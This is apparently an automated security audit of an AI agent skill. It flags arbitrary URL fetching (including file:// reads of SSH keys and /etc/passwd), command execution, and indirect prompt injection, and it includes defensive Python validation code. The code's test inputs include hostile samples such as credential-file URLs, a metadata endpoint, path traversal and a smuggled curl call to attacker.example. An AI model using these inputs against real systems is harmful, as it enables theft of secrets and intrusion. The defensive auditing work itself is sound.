problem-statement

Fail

Audited by Gen Agent Trust Hub on Feb 12, 2026

Risk Level: HIGH
Findings: EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis

The skill problem-statement presents several security concerns:

  1. EXTERNAL_DOWNLOADS / DATA_EXFILTRATION (HIGH): The instruction 'Document link: Fetch and extract relevant context' implies that the skill fetches content from whatever URL the user supplies. Fetching untrusted URLs is a high-risk capability: an attacker can point the link at a malicious external resource so that harmful content is downloaded into the agent's context. More critically, if the underlying fetch mechanism honours file:// URLs, the attacker can direct the skill at sensitive local files (e.g. file:///etc/passwd or file://~/.ssh/id_rsa). The skill does not state that it sends this data anywhere, but reading arbitrary local files into the agent's context is itself a severe data exfiltration risk, because whatever is read can be echoed back to the requester or carried into later tool calls.

  2. COMMAND_EXECUTION (HIGH): The skill explicitly runs the command open -a Typora PROBLEM.md. The arguments (Typora and PROBLEM.md) are fixed in this instruction, but direct command execution is a significant capability in itself: if an attacker could influence the application name or the file path (for example through prompt injection), the fixed command would become arbitrary command execution.

  3. PROMPT_INJECTION (INFO): The skill takes user input to generate the PROBLEM.md file. If that generated markdown is later read by an LLM or another tool, instructions embedded in the user's input can act as an indirect prompt injection against the downstream system, steering its behaviour.

  4. EXTERNAL_DOWNLOADS (LOW): The skill uses mcp__plugin_atlassian_atlassian__getJiraIssue to interact with Jira. Assuming mcp is a trusted internal agent mechanism, this is recorded as an external interaction rather than an 'unverifiable dependency' in the traditional sense; it nevertheless remains an interaction with an external system whose responses are untrusted input.
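The first two findings each have a standard control: an allow-list on the URL scheme and host before anything is fetched, and a fixed-argv launcher (no shell) that confines the path for the open -a Typora step. The block below is an added example written for this audit, not code from the problem-statement skill or from Gen Agent Trust Hub; the allowed document hosts, the workspace directory and the size cap are assumptions chosen for illustration.

```python
# Added example (not the skill's own code): the two controls the findings above
# call for. A scheme/host allow-list in front of "fetch the document link", and a
# fixed-argv, path-confined launcher for "open -a Typora PROBLEM.md".
# ALLOWED_HOSTS, WORKSPACE and MAX_DOCUMENT_BYTES are assumptions for illustration.
import os
import subprocess
from urllib.parse import urlsplit
from urllib.request import urlopen

ALLOWED_SCHEMES = {"https"}                              # file://, http://, ftp:// all refused
ALLOWED_HOSTS = {"docs.example.com", "wiki.example.com"}  # assumed document hosts
WORKSPACE = "/tmp/problem-statement"                     # assumed output directory
MAX_DOCUMENT_BYTES = 2 * 1024 * 1024                     # assumed hard cap on a fetched document


class RejectedInput(ValueError):
    """Raised when a link or path handed to the skill fails validation."""


def validate_document_link(url: str) -> str:
    """Return the URL if it targets an allowed https host, otherwise raise.

    Runs before any fetch, so file:///etc/passwd, http://169.254.169.254/ and
    https://docs.example.com@evil.example/ are all refused up front.
    """
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise RejectedInput(f"scheme {parts.scheme!r} not allowed")
    # .hostname drops any user:pass@ prefix, so the check lands on the real host
    if parts.hostname is None or parts.hostname.lower() not in ALLOWED_HOSTS:
        raise RejectedInput(f"host {parts.hostname!r} not allowed")
    if parts.username is not None or parts.password is not None:
        raise RejectedInput("credentials embedded in URL")
    return url


def fetch_document(url: str, timeout: float = 10.0) -> bytes:
    """Fetch an allow-listed document with a timeout and a hard size cap."""
    safe_url = validate_document_link(url)
    with urlopen(safe_url, timeout=timeout) as resp:  # network call; not exercised offline
        return resp.read(MAX_DOCUMENT_BYTES)


def typora_argv(path: str) -> list[str]:
    """Build argv for 'open -a Typora PROBLEM.md' with nothing attacker-controlled.

    Program and application name are constants. The path is resolved, must stay
    inside WORKSPACE and must be named PROBLEM.md. Because the resolved path is
    absolute it can never begin with '-', so open(1) cannot read it as an option.
    """
    real = os.path.realpath(path)
    root = os.path.realpath(WORKSPACE)
    if os.path.commonpath([real, root]) != root:
        raise RejectedInput(f"{path!r} resolves outside the workspace")
    if os.path.basename(real) != "PROBLEM.md":
        raise RejectedInput("only PROBLEM.md may be opened")
    return ["open", "-a", "Typora", real]


def open_in_typora(path: str) -> None:
    """Launch the editor from an argv list: no shell, so ';' or '$(...)' in path is inert."""
    subprocess.run(typora_argv(path), check=True)  # shell=False is the default


if __name__ == "__main__":
    # Constructed inputs an attacker might feed through the document-link field.
    for link in ["file:///etc/passwd", "file://~/.ssh/id_rsa",
                 "http://169.254.169.254/latest/meta-data/",
                 "https://docs.example.com@evil.example/",
                 "https://docs.example.com/spec/problem.md"]:
        try:
            print("allow ", validate_document_link(link))
        except RejectedInput as err:
            print("reject", link, "->", err)
    for p in ["/tmp/problem-statement/PROBLEM.md",
              "/tmp/problem-statement/../../etc/passwd",
              "PROBLEM.md; curl http://attacker.example/x"]:
        try:
            print("argv  ", typora_argv(p))
        except RejectedInput as err:
            print("reject", p, "->", err)
```

The host allow-list is what turns the finding from "arbitrary URL fetch" into "fetch from two known document systems"; an allow-list on the scheme alone would still leave internal HTTP endpoints reachable. For the launcher, the point is that the validated path is the only variable and it travels as a single argv element, so nothing in it is ever interpreted by a shell.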

Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 12, 2026, 02:28 PM